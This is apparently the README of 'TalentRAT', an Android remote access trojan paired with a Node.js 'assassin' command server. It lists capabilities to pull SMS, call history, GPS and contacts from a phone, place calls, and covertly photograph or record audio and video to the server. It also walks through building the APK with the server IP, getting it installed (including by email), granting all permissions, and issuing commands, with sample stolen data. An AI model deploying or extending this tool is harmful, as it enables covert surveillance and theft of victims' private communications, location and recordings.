- beta 1.0.0
- adapter android Lollipop-Pie
- commit issues to me
- get Sms_List
- send Sms to destinationAddress
- get Calling_History
- get GPS
- get Contacts_List
- call someone
- take a photo then send to server
- record audio then send to server
- record video then send to server
of course the duration decided by yourself
- Gradle
- JDK1.8
- AndroidSdk
- node.js
- npm
-V, --version output the version number
-a,--assassin <assassin> select a command post to the clients if you choose the shadow you should input the cmd -t to choose a type between pic/audio/video [sms,contacts,call,gps,shadow] (default: "sms")
-C,--Clients show every client info
-d,--address <address> input a phone num who you want to send a msg
-m,--msg <msg> you should write the msg content, if your command is sms
-t,--type <type> select a type between pic/audio/video and you should input the -l to choose the camera lens [pic,audio,video]
-c,--client <client> select a client to post the command
-l,--lens <lens> which camera lens that you want to open [0,1]
-h, --help output usage information
1. git clone [email protected]:honglvt/TalentRAT.git / or download the project yourself on the github
2. cd the project path such as: ~/AndroidProject/ProjectPath/Server/
3. cd Server
4. npm install
5. npm start
now you can see the terminal console "ASSASSIN"
befor build the apk
- confrim that you have prepare the env for building the app
- connect the android device to ur PC
- enable the develop mode on ur android device if you can not do step.2 and step.3 you can build the assassin.apk and install it to your device manually now let's start assembleApk
at the first time when you download the project you should confirm your OS type mac or linux,
and get your server IPAdress by "ifconfig/ipconfig"
0. chmod 777 ./assembleApk.sh
chmod 777 ./installNewestApk.sh
1. execute the assemble shell "./assaembleApk.sh OS serverIP"
serverIP type as
OS type as mac or linux
as follows:
"./assembleApk.sh mac"
"./assembleApk.sh linux localHost:3000"
2. ./installNewestApk.sh
if you are not able to connect the device to your PC, send the apk by email or xx and install it manually
3. look at your device, the apk has been installed into your device
run it
grant all of permissions
and now you can see { a user connected info }at terminal you have opened at Step.1
cmd | ./assassin.js -a sms -c 9910294050493 |
description | select the command between [sms,contacts,call,gps,shadow] if you choose the shadow you should also use -t to choose a type between pic/audio/video |
and the result:
"command": "send_contacts_list",
"IMEI": "99001249798100"
response is :
[{name:ASX,phoneNum:2345 67}]
cmd | -a |
description | select the command between [sms,contacts,call,gps,shadow] if you choose the shadow you should also use -t to choose a type between pic/audio/video |
example | ‘’./assassin.js -a sms‘’ ‘’ ./assassin.js -a shadow -t pic ‘’ |
result | ERROR:you should input a type with -c to choose a client that you want to send cmd |
cmd | -C |
description | show every client info |
example | ‘’./assassin.js -C ‘’ |
result | {IMEI:9525238415950202,brand:Nokia,model:CAL-20,version:9.0} |
cmd | -c |
description | select a client with its IMEI to post the command |
example | ‘’./assassin.js -a sms -c 9525238415950202 ‘’ |
result | { command: 'send_sms_list', IMEI: '184859203' } |
- keep node server alive when you send a command
- cmd with ./assassin.js will return a Json data you can do whatever with the response
- if you want to get a pic or video you should type the cmd as follow:
- ./assassin.js -a shadow -c 123456 -t pic -l 0
- then you can find the pic has saved on the */project/Server/public/images/xxxx.jpeg'
- the same with other shadow
- the duration in recording video or audio decided by yourself